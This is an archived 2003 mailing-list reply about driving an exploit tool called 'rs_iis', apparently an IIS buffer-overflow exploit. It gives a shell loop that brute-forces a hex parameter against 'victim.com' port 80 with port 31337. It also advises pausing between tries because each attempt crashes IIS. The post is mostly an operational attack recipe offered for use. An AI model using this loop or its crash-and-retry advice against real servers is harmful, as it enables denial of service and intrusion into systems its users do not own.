On Monday 31 March 2003 10:14 am, Jeremy Junginger wrote:
> Basically, the goal is as follows:
>
> 1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern
> (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
> 2) pass the output to rs_iis via system() command?
How about just running it from your shell like:
for i in `perl -e 'for (0..255) { printf "0x%02x%02x\n", $_, $_ }'`; do \
./rs_iis victim.com 80 31337 $i; done
Remember that IIS will need time to recover from the crash caused by the
overflow, so you may need to sleep for some period of time between tries.
-Joe
--
Joe Stewart, GCIH
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 09:42:19 PST